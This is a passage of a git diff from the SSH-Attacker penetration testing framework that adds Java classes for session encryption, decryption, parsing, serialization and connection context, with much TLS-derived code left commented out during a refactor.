ArrayConverter.bytesToHexString(keySet.getClientWriteIv())); + keySet.setServerWriteIv( + HKDFunction.expandLabel( + hkdfAlgorithm, + serverSecret, + HKDFunction.IV, + new byte[] {}, + AEAD_IV_LENGTH)); + LOGGER.debug( + "Server write IV: {}", ArrayConverter.bytesToHexString(keySet.getServerWriteIv())); + keySet.setServerWriteMacSecret(new byte[0]); + keySet.setClientWriteMacSecret(new byte[0]); + return keySet; + }*/ + + private static KeySet getTlsKeySet(SshContext sshContext) throws CryptoException { + /*ProtocolVersion protocolVersion = sshContext.getChooser().getSelectedProtocolVersion(); + CipherSuite cipherSuite = sshContext.getChooser().getSelectedCipherSuite(); + byte[] masterSecret = sshContext.getChooser().getMasterSecret(); + byte[] seed = + ArrayConverter.concatenate( + sshContext.getChooser().getServerRandom(), + sshContext.getChooser().getClientRandom()); + + byte[] keyBlock; + if (protocolVersion.isSSL()) { + keyBlock = + SSLUtils.calculateKeyBlockSSL3( + masterSecret, seed, getSecretSetSize(protocolVersion, cipherSuite)); + } else { + PRFAlgorithm prfAlgorithm = + AlgorithmResolver.getPRFAlgorithm(protocolVersion, cipherSuite); + keyBlock = + PseudoRandomFunction.compute( + prfAlgorithm, + masterSecret, + PseudoRandomFunction.KEY_EXPANSION_LABEL, + seed, + getSecretSetSize(protocolVersion, cipherSuite)); + } + LOGGER.debug( + "A new key block was generated: {}", ArrayConverter.bytesToHexString(keyBlock)); + KeyBlockParser parser = new KeyBlockParser(keyBlock, cipherSuite, protocolVersion); + KeySet keySet = new KeySet(); + parser.parse(keySet); + if (cipherSuite.isExportSymmetricCipher()) { + deriveExportKeys(keySet, sshContext); + } + return keySet;*/ + return null; + } + + /*private static void deriveExportKeys(KeySet keySet, TlsContext tlsContext) + throws CryptoException { + ProtocolVersion protocolVersion = tlsContext.getChooser().getSelectedProtocolVersion(); + CipherSuite cipherSuite = tlsContext.getChooser().getSelectedCipherSuite(); + byte[] clientRandom = tlsContext.getChooser().getClientRandom(); + byte[] serverRandom = tlsContext.getChooser().getServerRandom(); + + if (protocolVersion == ProtocolVersion.SSL3) { + deriveSSL3ExportKeys(cipherSuite, keySet, clientRandom, serverRandom); + return; + } + + byte[] clientAndServerRandom = ArrayConverter.concatenate(clientRandom, serverRandom); + PRFAlgorithm prfAlgorithm = AlgorithmResolver.getPRFAlgorithm(protocolVersion, cipherSuite); + int keySize = AlgorithmResolver.getCipher(cipherSuite).getKeySize(); + + keySet.setClientWriteKey( + PseudoRandomFunction.compute( + prfAlgorithm, + keySet.getClientWriteKey(), + PseudoRandomFunction.CLIENT_WRITE_KEY_LABEL, + clientAndServerRandom, + keySize)); + keySet.setServerWriteKey( + PseudoRandomFunction.compute( + prfAlgorithm, + keySet.getServerWriteKey(), + PseudoRandomFunction.SERVER_WRITE_KEY_LABEL, + clientAndServerRandom, + keySize)); + + int blockSize = AlgorithmResolver.getCipher(cipherSuite).getBlocksize(); + byte[] emptySecret = {}; + byte[] ivBlock = + PseudoRandomFunction.compute( + prfAlgorithm, + emptySecret, + PseudoRandomFunction.IV_BLOCK_LABEL, + clientAndServerRandom, + 2 * blockSize); + keySet.setClientWriteIv(Arrays.copyOfRange(ivBlock, 0, blockSize)); + keySet.setServerWriteIv(Arrays.copyOfRange(ivBlock, blockSize, 2 * blockSize)); + } + + private static byte[] md5firstNBytes(int numOfBytes, byte[]... byteArrays) { + byte[] md5 = MD5Utils.md5(byteArrays); + return Arrays.copyOfRange(md5, 0, numOfBytes); + } + + private static void deriveSSL3ExportKeys( + CipherSuite cipherSuite, KeySet keySet, byte[] clientRandom, byte[] serverRandom) { + int keySize = AlgorithmResolver.getCipher(cipherSuite).getKeySize(); + keySet.setClientWriteKey( + md5firstNBytes(keySize, keySet.getClientWriteKey(), clientRandom, serverRandom)); + keySet.setServerWriteKey( + md5firstNBytes(keySize, keySet.getServerWriteKey(), serverRandom, clientRandom)); + + int blockSize = AlgorithmResolver.getCipher(cipherSuite).getBlocksize(); + keySet.setClientWriteIv(md5firstNBytes(blockSize, clientRandom, serverRandom)); + keySet.setServerWriteIv(md5firstNBytes(blockSize, serverRandom, clientRandom)); + } + + private static int getSecretSetSize(ProtocolVersion protocolVersion, CipherSuite cipherSuite) + throws CryptoException { + switch (AlgorithmResolver.getCipherType(cipherSuite)) { + case AEAD: + return getAeadSecretSetSize(protocolVersion, cipherSuite); + case BLOCK: + return getBlockSecretSetSize(protocolVersion, cipherSuite); + case STREAM: + return getStreamSecretSetSize(protocolVersion, cipherSuite); + default: + throw new CryptoException("Unknown CipherType"); + } + } + + private static int getBlockSecretSetSize( + ProtocolVersion protocolVersion, CipherSuite cipherSuite) { + CipherAlgorithm cipherAlg = AlgorithmResolver.getCipher(cipherSuite); + int keySize = cipherAlg.getKeySize(); + MacAlgorithm macAlg = AlgorithmResolver.getMacAlgorithm(protocolVersion, cipherSuite); + int secretSetSize = (2 * keySize) + (2 * macAlg.getKeySize()); + if (!protocolVersion.usesExplicitIv()) { + secretSetSize += (2 * cipherAlg.getNonceBytesFromHandshake()); + } + return secretSetSize; + } + + private static int getAeadSecretSetSize( + ProtocolVersion protocolVersion, CipherSuite cipherSuite) { + CipherAlgorithm cipherAlg = AlgorithmResolver.getCipher(cipherSuite); + int keySize = cipherAlg.getKeySize(); + int saltSize = AEAD_IV_LENGTH - cipherAlg.getNonceBytesFromRecord(); + int secretSetSize = 2 * keySize + 2 * saltSize; + return secretSetSize; + } + + private static int getStreamSecretSetSize( + ProtocolVersion protocolVersion, CipherSuite cipherSuite) { + CipherAlgorithm cipherAlg = AlgorithmResolver.getCipher(cipherSuite); + MacAlgorithm macAlg = AlgorithmResolver.getMacAlgorithm(protocolVersion, cipherSuite); + int secretSetSize = (2 * cipherAlg.getKeySize()) + (2 * macAlg.getKeySize()); + if (cipherSuite.isSteamCipherWithIV()) { + secretSetSize += (2 * cipherAlg.getNonceBytesFromHandshake()); + } + return secretSetSize; + }*/ + + private KeySetGenerator() {} +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/crypto/Decryptor.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/crypto/Decryptor.java new file mode 100644 index 000000000..f18073d4e --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/crypto/Decryptor.java @@ -0,0 +1,24 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.session.crypto; + +import de.rub.nds.sshattacker.core.session.Session; +import de.rub.nds.sshattacker.core.session.cipher.SessionCipher; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public abstract class Decryptor extends SessionCryptoUnit { + + private static final Logger LOGGER = LogManager.getLogger(); + + public Decryptor(SessionCipher cipher) { + super(cipher); + } + + public abstract void decrypt(Session object); +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/crypto/Encryptor.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/crypto/Encryptor.java new file mode 100644 index 000000000..a127f092f --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/crypto/Encryptor.java @@ -0,0 +1,24 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.session.crypto; + +import de.rub.nds.sshattacker.core.session.Session; +import de.rub.nds.sshattacker.core.session.cipher.SessionCipher; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public abstract class Encryptor extends SessionCryptoUnit { + + private static final Logger LOGGER = LogManager.getLogger(); + + public Encryptor(SessionCipher cipher) { + super(cipher); + } + + public abstract void encrypt(Session object); +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/crypto/SessionCryptoUnit.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/crypto/SessionCryptoUnit.java new file mode 100644 index 000000000..47f3a2417 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/crypto/SessionCryptoUnit.java @@ -0,0 +1,56 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.session.crypto; + +import de.rub.nds.sshattacker.core.session.cipher.SessionCipher; +import java.util.ArrayList; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public abstract class SessionCryptoUnit { + + private static final Logger LOGGER = LogManager.getLogger(); + + protected ArrayList sessionCipherList; + + public SessionCryptoUnit(SessionCipher sessionCipher) { + this.sessionCipherList = new ArrayList<>(); + sessionCipherList.add(0, sessionCipher); + } + + public SessionCipher getSessionMostRecentCipher() { + return sessionCipherList.get(sessionCipherList.size() - 1); + } + + public SessionCipher getSessionCipher(int epoch) { + if (sessionCipherList.size() > epoch) { + return sessionCipherList.get(epoch); + } else { + LOGGER.warn("Got no RecordCipher for epoch: " + epoch + " using epoch 0 cipher"); + return sessionCipherList.get(0); + } + } + + public void addNewRecordCipher(SessionCipher sessionCipher) { + this.sessionCipherList.add(sessionCipher); + } + + public void removeAllCiphers() { + this.sessionCipherList = new ArrayList<>(); + } + + public void removeCiphers(int toRemove) { + while (toRemove > 0 && !sessionCipherList.isEmpty()) { + sessionCipherList.remove(sessionCipherList.size() - 1); + toRemove--; + } + if (toRemove > 0) { + LOGGER.warn("Could not remove as many ciphers as specified"); + } + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/crypto/SessionDecryptor.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/crypto/SessionDecryptor.java new file mode 100644 index 000000000..1341e0cb7 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/crypto/SessionDecryptor.java @@ -0,0 +1,65 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.session.crypto; + +import de.rub.nds.sshattacker.core.exceptions.ParserException; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.session.Session; +import de.rub.nds.sshattacker.core.session.cipher.SessionCipher; +import de.rub.nds.sshattacker.core.session.cipher.SessionCipherFactory; +import de.rub.nds.sshattacker.core.session.cipher.SessionNullCipher; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class SessionDecryptor extends Decryptor { + + private static final Logger LOGGER = LogManager.getLogger(); + + private final SshContext sshContext; + + private SessionNullCipher nullCipher; + + public SessionDecryptor(SessionCipher sessionCipher, SshContext sshContext) { + super(sessionCipher); + this.sshContext = sshContext; + nullCipher = SessionCipherFactory.getNullCipher(sshContext); + } + + @Override + public void decrypt(Session session) throws ParserException { + LOGGER.debug("Decrypting Record"); + SessionCipher sessionCipher; + /*if (sshContext.getChooser().getSelectedProtocolVersion().isDTLS() + && session.getEpoch() != null + && session.getEpoch().getValue() != null) { + sessionCipher = getSessionCipher(session.getEpoch().getValue()); + } else { + sessionCipher = getSessionMostRecentCipher(); + }*/ + session.prepareComputations(); + /*ProtocolVersion version = + ProtocolVersion.getProtocolVersion(session.getProtocolVersion().getValue()); + if (version == null || !version.isDTLS()) { + session.setSequenceNumber( + BigInteger.valueOf(sessionCipher.getState().getReadSequenceNumber())); + } + + try { + if (!sshContext.getChooser().getSelectedProtocolVersion().isTLS13() + || session.getContentMessageType() != ProtocolMessageType.CHANGE_CIPHER_SPEC) { + sessionCipher.decrypt(session); + sessionCipher.getState().increaseReadSequenceNumber(); + } else { + LOGGER.debug("Skipping decryption for legacy CCS"); + new RecordNullCipher(sshContext, sessionCipher.getState()).decrypt(session); + } + } catch (CryptoException ex) { + throw new ParserException(ex); + }*/ + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/crypto/SessionEncryptor.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/crypto/SessionEncryptor.java new file mode 100644 index 000000000..c776619e0 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/crypto/SessionEncryptor.java @@ -0,0 +1,61 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.session.crypto; + +import de.rub.nds.sshattacker.core.exceptions.CryptoException; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.session.Session; +import de.rub.nds.sshattacker.core.session.cipher.SessionCipher; +import de.rub.nds.sshattacker.core.session.cipher.SessionCipherFactory; +import de.rub.nds.sshattacker.core.session.cipher.SessionNullCipher; +import java.math.BigInteger; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class SessionEncryptor extends Encryptor { + + private static final Logger LOGGER = LogManager.getLogger(); + + private final SshContext sshContext; + + private final SessionNullCipher nullCipher; + + public SessionEncryptor(SessionCipher sessionCipher, SshContext sshContext) { + super(sessionCipher); + this.sshContext = sshContext; + nullCipher = SessionCipherFactory.getNullCipher(sshContext); + } + + @Override + public void encrypt(Session session) { + LOGGER.debug("Encrypting Record:"); + SessionCipher sessionCipher; + sessionCipher = getSessionMostRecentCipher(); + /*if (sshContext.getChooser().getSelectedProtocolVersion().isDTLS()) { + sessionCipher = getSessionCipher(session.getEpoch().getValue()); + } else { + sessionCipher = getSessionMostRecentCipher(); + }*/ + try { + session.setSequenceNumber( + BigInteger.valueOf(sessionCipher.getState().getWriteSequenceNumber())); + sessionCipher.encrypt(session); + } catch (CryptoException ex) { + LOGGER.warn("Could not encrypt BlobRecord. Using NullCipher", ex); + try { + nullCipher.encrypt(session); + } catch (CryptoException ex1) { + LOGGER.error("Could not encrypt with NullCipher", ex1); + } + } + sessionCipher.getState().increaseWriteSequenceNumber(); + /*if (sshContext.getChooser().getSelectedProtocolVersion().isTLS13()) { + session.getComputations().setUsedTls13KeySetType(sshContext.getActiveKeySetTypeWrite()); + }*/ + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/parser/SessionParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/parser/SessionParser.java new file mode 100644 index 000000000..0aa573aa6 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/parser/SessionParser.java @@ -0,0 +1,107 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.session.parser; + +/* +import de.rub.nds.sshattacker.core.constants.ProtocolMessageType; +import de.rub.nds.sshattacker.core.constants.ProtocolVersion; + */ + +import de.rub.nds.sshattacker.core.constants.SessionByteLength; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.layer.data.Parser; +import de.rub.nds.sshattacker.core.session.Session; +import java.io.InputStream; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class SessionParser extends Parser { + + private static final Logger LOGGER = LogManager.getLogger(); + + // private final ProtocolVersion version; + private final SshContext sshContext; + + /*public SessionParser(InputStream stream, ProtocolVersion version, SshContext sshContext) { + super(stream); + //this.version = version; + this.sshContext = sshContext; + }*/ + + public SessionParser(SshContext sshContext, InputStream stream) { + super(stream); + // this.version = version; + this.sshContext = sshContext; + } + + @Override + public void parse(Session session) { + LOGGER.debug("Parsing Record"); + /*parseContentType(session); + ProtocolMessageType protocolMessageType = + ProtocolMessageType.getContentType(session.getContentType().getValue()); + if (protocolMessageType == null) { + protocolMessageType = ProtocolMessageType.UNKNOWN; + } + session.setContentMessageType(protocolMessageType); + parseVersion(session); + if (version.isDTLS()) { + parseEpoch(session); + parseSequenceNumber(session); + if (protocolMessageType == ProtocolMessageType.TLS12_CID) { + parseConnectionId(session); + } + } + parseLength(session); + parseProtocolMessageBytes(session); + session.setCompleteRecordBytes(getAlreadyParsed());*/ + } + + private void parseEpoch(Session session) { + session.setEpoch(parseIntField(SessionByteLength.DTLS_EPOCH)); + LOGGER.debug("Epoch: " + session.getEpoch().getValue()); + } + + private void parseSequenceNumber(Session session) { + session.setSequenceNumber(parseBigIntField(SessionByteLength.DTLS_SEQUENCE_NUMBER)); + LOGGER.debug("SequenceNumber: " + session.getSequenceNumber().getValue()); + } + + private void parseConnectionId(Session session) { + /*int connectionIdLength = + sshContext + .getRecordLayer() + .getDecryptor() + .getRecordCipher(session.getEpoch().getValue()) + .getState() + .getConnectionId() + .length; + session.setConnectionId(parseByteArrayField(connectionIdLength));*/ + LOGGER.debug("ConnectionID: {}", session.getConnectionId().getValue()); + } + + private void parseContentType(Session session) { + session.setContentType(parseByteField(SessionByteLength.CONTENT_TYPE)); + LOGGER.debug("ContentType: " + session.getContentType().getValue()); + } + + private void parseVersion(Session session) { + session.setProtocolVersion(parseByteArrayField(SessionByteLength.PROTOCOL_VERSION)); + LOGGER.debug("ProtocolVersion: {}", session.getProtocolVersion().getValue()); + } + + private void parseLength(Session session) { + session.setLength(parseIntField(SessionByteLength.RECORD_LENGTH)); + LOGGER.debug("Length: " + session.getLength().getValue()); + } + + private void parseProtocolMessageBytes(Session session) { + session.setProtocolMessageBytes(parseByteArrayField(session.getLength().getValue())); + LOGGER.debug("ProtocolMessageBytes: {}", session.getProtocolMessageBytes().getValue()); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/preparator/SessionPreparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/preparator/SessionPreparator.java new file mode 100644 index 000000000..01b1e0466 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/preparator/SessionPreparator.java @@ -0,0 +1,115 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.session.preparator; + +/*import de.rub.nds.sshattacker.core.record.compressor.RecordCompressor; +import de.rub.nds.sshattacker.core.record.crypto.Encryptor; +import de.rub.nds.sshattacker.core.constants.ProtocolVersion; +import de.rub.nds.sshattacker.core.constants.Tls13KeySetType;*/ + +import de.rub.nds.sshattacker.core.constants.ProtocolMessageType; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.layer.data.Preparator; +import de.rub.nds.sshattacker.core.session.Session; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +/** The cleanRecordBytes should be set when the record preparator received the record */ +public class SessionPreparator extends Preparator { + + private static final Logger LOGGER = LogManager.getLogger(); + + private final Session session; + // private final Encryptor encryptor; + private final SshContext sshContext; + // private final RecordCompressor compressor; + + private ProtocolMessageType type; + + public SessionPreparator( + SshContext sshContext, + Session session, + // Encryptor encryptor, + ProtocolMessageType type) { + // RecordCompressor compressor) { + super(sshContext.getChooser(), session); + this.session = session; + // this.encryptor = encryptor; + this.sshContext = sshContext; + // this.compressor = compressor; + this.type = type; + } + + @Override + public void prepare() { + LOGGER.debug("Preparing Record"); + prepareConnectionId(session); + session.prepareComputations(); + prepareContentType(session); + prepareProtocolVersion(session); + // compressor.compress(session); + encrypt(); + } + + public void encrypt() { + LOGGER.debug("Encrypting Record"); + /*if (chooser.getSelectedProtocolVersion().isTLS13() + && session.getContentMessageType() == ProtocolMessageType.CHANGE_CIPHER_SPEC + && !chooser.getConfig().isEncryptChangeCipherSpec()) { + // The CCS message in TLS 1.3 is an exception that does not get + // encrypted + session.prepareComputations(); + session.setProtocolMessageBytes(session.getCleanProtocolMessageBytes().getValue()); + } else { + encryptor.encrypt(session); + } + prepareLength(session);*/ + } + + private void prepareConnectionId(Session session) { + /*if (chooser.getSelectedProtocolVersion().isDTLS()) { + RecordLayer recordLayer = sshContext.getRecordLayer(); + byte[] connectionId = + recordLayer + .getEncryptor() + .getRecordCipher(recordLayer.getWriteEpoch()) + .getState() + .getConnectionId(); + if (connectionId != null) { + session.setConnectionId(connectionId); + LOGGER.debug("ConnectionId: {}", session.getConnectionId().getValue()); + } + }*/ + } + + private void prepareContentType(Session session) { + session.setContentType(type.getValue()); + LOGGER.debug("ContentType: " + type.getValue()); + prepareContentMessageType(type); + } + + private void prepareProtocolVersion(Session session) { + /*if (chooser.getSelectedProtocolVersion().isTLS13() + || sshContext.getActiveKeySetTypeWrite() == Tls13KeySetType.EARLY_TRAFFIC_SECRETS) { + session.setProtocolVersion(ProtocolVersion.TLS12.getValue()); + } else { + session.setProtocolVersion(chooser.getSelectedProtocolVersion().getValue()); + } + LOGGER.debug("ProtocolVersion: {}", session.getProtocolVersion().getValue());*/ + } + + private void prepareLength(Session session) { + session.setLength(session.getProtocolMessageBytes().getValue().length); + LOGGER.debug("Length: " + session.getLength().getValue()); + } + + protected void prepareContentMessageType(ProtocolMessageType type) { + // getObject().setContentMessageType(this.type); + LOGGER.debug("ContentMessageType: {}", type.getArrayValue()); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/serializer/SessionSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/serializer/SessionSerializer.java new file mode 100644 index 000000000..f5c72af01 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/serializer/SessionSerializer.java @@ -0,0 +1,78 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.session.serializer; + +import de.rub.nds.sshattacker.core.constants.SessionByteLength; +import de.rub.nds.sshattacker.core.layer.data.Serializer; +import de.rub.nds.sshattacker.core.session.Session; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class SessionSerializer extends Serializer { + + private static final Logger LOGGER = LogManager.getLogger(); + + private final Session session; + + public SessionSerializer(Session session) { + this.session = session; + } + + @Override + protected byte[] serializeBytes() { + LOGGER.debug("Serializing Record"); + writeContentType(session); + writeProtocolVersion(session); + if (session.getEpoch() != null) { + writeEpoch(session); + writeSequenceNumber(session); + } + if (session.getConnectionId() != null) { + writeConnectionId(session); + } + writeLength(session); + writeProtocolMessageBytes(session); + return getAlreadySerialized(); + } + + private void writeContentType(Session session) { + appendByte(session.getContentType().getValue()); + LOGGER.debug("ContentType: " + session.getContentType().getValue()); + } + + private void writeProtocolVersion(Session session) { + appendBytes(session.getProtocolVersion().getValue()); + LOGGER.debug("ProtocolVersion: {}", session.getProtocolVersion().getValue()); + } + + private void writeLength(Session session) { + appendInt(session.getLength().getValue(), SessionByteLength.RECORD_LENGTH); + LOGGER.debug("Length: " + session.getLength().getValue()); + } + + private void writeConnectionId(Session session) { + appendBytes(session.getConnectionId().getValue()); + LOGGER.debug("ConnectionID: {}", session.getConnectionId().getValue()); + } + + private void writeEpoch(Session session) { + appendInt(session.getEpoch().getValue(), SessionByteLength.DTLS_EPOCH); + LOGGER.debug("Epoch: " + session.getEpoch().getValue()); + } + + private void writeSequenceNumber(Session session) { + appendBigInteger( + session.getSequenceNumber().getValue(), SessionByteLength.DTLS_SEQUENCE_NUMBER); + LOGGER.debug("SequenceNumber: " + session.getSequenceNumber().getValue()); + } + + private void writeProtocolMessageBytes(Session session) { + appendBytes(session.getProtocolMessageBytes().getValue()); + LOGGER.debug("ProtocolMessageBytes: {}", session.getProtocolMessageBytes().getValue()); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/state/Context.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/state/Context.java new file mode 100644 index 000000000..2925ae73e --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/state/Context.java @@ -0,0 +1,185 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.state; + +import de.rub.nds.sshattacker.core.config.Config; +import de.rub.nds.sshattacker.core.connection.AliasedConnection; +import de.rub.nds.sshattacker.core.constants.ChooserType; +import de.rub.nds.sshattacker.core.constants.PacketLayerType; +import de.rub.nds.sshattacker.core.constants.RunningModeType; +import de.rub.nds.sshattacker.core.exceptions.ConfigurationException; +import de.rub.nds.sshattacker.core.layer.LayerStack; +import de.rub.nds.sshattacker.core.layer.LayerStackFactory; +import de.rub.nds.sshattacker.core.layer.constant.LayerConfiguration; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.layer.context.TcpContext; +import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; +import de.rub.nds.sshattacker.core.workflow.chooser.ChooserFactory; +import de.rub.nds.tlsattacker.transport.ConnectionEndType; +import de.rub.nds.tlsattacker.transport.TransportHandler; +import jakarta.xml.bind.annotation.XmlAccessType; +import jakarta.xml.bind.annotation.XmlAccessorType; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +/** + * Contains runtime information about a connection. With the introduction of the layer system all + * layer-specific variables have been moved to the respective layer-context (e.g. {@link + * SshContext}. + */ +@XmlAccessorType(XmlAccessType.FIELD) +public class Context { + + private static final Logger LOGGER = LogManager.getLogger(); + + /** TODO: Replace with standard values in layer contexts */ + private Chooser chooser; + + /** TODO: Replace with configs split by layer */ + private Config config; + + private TransportHandler transportHandler; + + private TcpContext tcpContext; + + private SshContext sshContext; + + private LayerStack layerStack; + + private ConnectionEndType talkingConnectionEndType = ConnectionEndType.CLIENT; + + /** The end point of the connection that this context represents. */ + private AliasedConnection connection; + + public Context(Config config) { + this.chooser = ChooserFactory.getChooser(ChooserType.DEFAULT, this, config); + this.config = config; + RunningModeType mode = config.getDefaultRunningMode(); + if (null == mode) { + throw new ConfigurationException("Cannot create connection, running mode not set"); + } else { + switch (mode) { + case CLIENT: + this.connection = config.getDefaultClientConnection(); + break; + case SERVER: + this.connection = config.getDefaultServerConnection(); + break; + default: + throw new ConfigurationException( + "Cannot create connection for unknown running mode " + + "'" + + mode + + "'"); + } + } + prepareWithLayers(config.getDefaultLayerConfiguration()); + } + + public Context(Config config, AliasedConnection connection) { + this.chooser = ChooserFactory.getChooser(ChooserType.DEFAULT, this, config); + this.config = config; + this.connection = connection; + prepareWithLayers(config.getDefaultLayerConfiguration()); + } + + public TcpContext getTcpContext() { + return tcpContext; + } + + public void setTcpContext(TcpContext tcpContext) { + this.tcpContext = tcpContext; + } + + public SshContext getSshContext() { + return sshContext; + } + + public void setSshContext(SshContext sshContext) { + this.sshContext = sshContext; + } + + public ConnectionEndType getTalkingConnectionEndType() { + return talkingConnectionEndType; + } + + public void setTalkingConnectionEndType(ConnectionEndType talkingConnectionEndType) { + this.talkingConnectionEndType = talkingConnectionEndType; + } + + public AliasedConnection getConnection() { + return connection; + } + + public void setConnection(AliasedConnection connection) { + this.connection = connection; + } + + public Chooser getChooser() { + return chooser; + } + + public void setChooser(Chooser chooser) { + this.chooser = chooser; + } + + public Config getConfig() { + return config; + } + + public void setConfig(Config config) { + this.config = config; + } + + public LayerStack getLayerStack() { + return layerStack; + } + + public void setLayerStack(LayerStack layerStack) { + this.layerStack = layerStack; + } + + public TransportHandler getTransportHandler() { + return transportHandler; + } + + public void setTransportHandler(TransportHandler transportHandler) { + this.transportHandler = transportHandler; + } + + public PacketLayerType getPacketLayerType() { + return sshContext.getPacketLayerType(); + } + + @Override + public String toString() { + StringBuilder info = new StringBuilder(); + if (connection == null) { + info.append("Context{ (no connection set) }"); + } else { + info.append("Context{'").append(connection.getAlias()).append("'"); + if (connection.getLocalConnectionEndType() == ConnectionEndType.SERVER) { + info.append(", listening on port ").append(connection.getPort()); + } else { + info.append(", connected to ") + .append(connection.getHostname()) + .append(":") + .append(connection.getPort()); + } + info.append("}"); + } + return info.toString(); + } + + public void prepareWithLayers(LayerConfiguration type) { + sshContext = new SshContext(this); + tcpContext = new TcpContext(this); + layerStack = LayerStackFactory.createLayerStack(type, this); + this.setLayerStack(layerStack); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/state/ContextContainer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/state/ContextContainer.java index 73c87a83f..981b5603b 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/state/ContextContainer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/state/ContextContainer.java @@ -29,19 +29,19 @@ public class ContextContainer { private final Set knownAliases = new HashSet<>(); - private final Map sshContexts = new HashMap<>(); + private final Map contexts = new HashMap<>(); /** * An inbound SSH context is a context bound to an incoming connection. I.e. it represents a * connection that we accepted from a connecting client. */ - private final List inboundSshContexts = new ArrayList<>(); + 